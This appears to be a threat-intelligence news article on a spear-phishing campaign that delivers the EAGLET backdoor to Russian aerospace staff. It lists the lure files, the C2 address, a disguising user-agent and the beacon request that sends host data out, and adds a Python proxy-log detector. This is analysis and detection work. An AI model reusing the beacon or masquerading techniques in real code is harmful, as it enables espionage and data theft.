Operation CargoTalon Attacking Russian Aerospace & Defense to Deploy EAGLET Implant

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

A sophisticated cyber espionage campaign dubbed “Operation CargoTalon” has emerged, specifically targeting Russia’s aerospace and defense sectors through carefully crafted spear-phishing attacks.

The operation, which surfaced in late June 2025, employs a multi-stage infection chain designed to deploy the EAGLET implant, a custom-built DLL backdoor capable of remote command execution and data exfiltration.

The campaign primarily focuses on employees of the Voronezh Aircraft Production Association (VASO), one of Russia’s major aircraft production entities.

Threat actors behind this operation leverage Transport Consignment Note (TTN) documents, which are critical to Russian logistics operations, as lures to deceive targets into executing malicious payloads.

The attack methodology demonstrates a deep understanding of Russian industrial operations and document workflows.

Seqrite analysts identified the campaign on June 27, 2025, when hunting for malicious spear-phishing attachments on threat intelligence platforms.

The researchers discovered that the threat actor, tracked as UNG0901, employs a sophisticated multi-stage attack vector that begins with malicious email files and progresses through LNK file execution to ultimately deploy the EAGLET implant.

The initial infection vector involves a malicious email file named “backup-message-10.2.2.20_9045-800282.eml” that contains an attachment masquerading as a ZIP file.

Infection Chain (Source – Seqrite)

This attachment, named “ТранспортнаянакладнаяТТН№391-44от_26.06.2025.zip” (Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip), is actually a malicious DLL file designed to evade detection through file type masquerading.

EAGLET’s Communication Protocol

The EAGLET implant demonstrates sophisticated command and control capabilities through its HTTP-based communication protocol.

Upon execution, the malware establishes persistence by creating a directory called “MicrosoftApppStore” and then connects to a command and control server located at 185.225.17.104.

The implant utilizes Windows networking APIs, specifically WinHttpOpen and WinHttpConnect, to establish HTTP sessions while masquerading under the user-agent string “MicrosoftAppStore/2001.0”.

This choice of user-agent appears designed to blend with legitimate Microsoft Store traffic, potentially evading network monitoring solutions that might overlook seemingly benign application store communications.

The malware’s initial beacon follows a structured format that exfiltrates basic system information:

GET /poll?id={randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1
Host: 185.225.17.104

This communication protocol enables the EAGLET implant to support three primary functions: remote shell access for executing arbitrary commands, file download capabilities for staging additional payloads, and automatic exfiltration of command results through HTTP POST requests to the “/result” endpoint.
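The beacon shape, the “/result” endpoint, the user-agent string and the C2 address described above are enough to build a first-pass detection over web proxy logs. The following is an added example written for this article, not Seqrite’s or the threat actor’s code; the proxy log format it parses (timestamp, source IP, method, URL, status, quoted user-agent) and every log line in it are constructed for illustration, and the two GUIDs and the 203.0.113.9 address are placeholders. It flags a request on any of four independent signals so that a beacon to a different host, or one whose user-agent has been changed, still surfaces on the query-parameter shape alone.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators quoted from the article.
BEACON_PATH = "/poll"
RESULT_PATH = "/result"
USER_AGENT = "MicrosoftAppStore/2001.0"
C2_ADDRESS = "185.225.17.104"

# Constructed proxy log format (an assumption for this example, not a real product's format):
#   <timestamp> <client-ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+'
    r'(?P<status>\d{3})\s+"(?P<ua>[^"]*)"$'
)

# The article says the id parameter is a randomly created GUID; match the 8-4-4-4-12 hex layout.
GUID_RE = re.compile(
    r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
)

# Constructed sample traffic: one full beacon + result post, one benign store request,
# and one beacon-shaped request to a different host with a changed user-agent.
SAMPLE_LOG = """\
2025-06-27T10:15:02Z 10.20.30.41 GET http://185.225.17.104/poll?id=3f2504e0-4f89-11d3-9a0c-0305e82c3301&hostname=WS-0142&domain=CORP 200 "MicrosoftAppStore/2001.0"
2025-06-27T10:15:03Z 10.20.30.41 POST http://185.225.17.104/result 200 "MicrosoftAppStore/2001.0"
2025-06-27T10:16:44Z 10.20.30.57 GET https://apps.microsoft.com/home 200 "Mozilla/5.0"
2025-06-27T10:17:10Z 10.20.30.63 GET http://203.0.113.9/poll?id=8b1c0f4e-2c3d-4e5f-8a9b-0c1d2e3f4a5b&hostname=WS-0220&domain=CORP 200 "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one log line into a dict of fields, or return None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of EAGLET-related signals this request matches (empty list if none)."""
    reasons = []
    parts = urlsplit(entry["url"])

    # Signal 1: the C2 address named in the report.
    if (parts.hostname or "") == C2_ADDRESS:
        reasons.append("known C2 address")

    # Signal 2: the implant's fixed user-agent string.
    if entry["ua"] == USER_AGENT:
        reasons.append("EAGLET user-agent")

    # Signal 3: the beacon shape, independent of host and user-agent.
    if entry["method"] == "GET" and parts.path == BEACON_PATH:
        qs = parse_qs(parts.query)
        if all(k in qs for k in ("id", "hostname", "domain")):
            reasons.append("beacon query shape (id/hostname/domain)")
            if GUID_RE.match(qs["id"][0]):
                reasons.append("GUID-shaped id")

    # Signal 4: command output pushed back over HTTP POST to /result.
    if entry["method"] == "POST" and parts.path == RESULT_PATH:
        reasons.append("POST to /result (command-result exfiltration)")

    return reasons


def scan(log_text):
    """Run the classifier over a whole log and return the flagged requests with their reasons."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line; a real pipeline would count these
        reasons = classify(entry)
        if reasons:
            hits.append({"ts": entry["ts"], "src": entry["src"],
                         "url": entry["url"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["src"]} {hit["url"]}')
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

The source that triggers only on the query shape (the fourth line) is the one worth a second look in practice: IP addresses and user-agent strings are the cheapest indicators for an operator to rotate, while the id/hostname/domain parameter set is part of how the implant and its server talk to each other.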

The implant’s infrastructure analysis reveals connections to the Head Mare threat group, suggesting possible resource sharing or operational overlap between these advanced persistent threat actors.
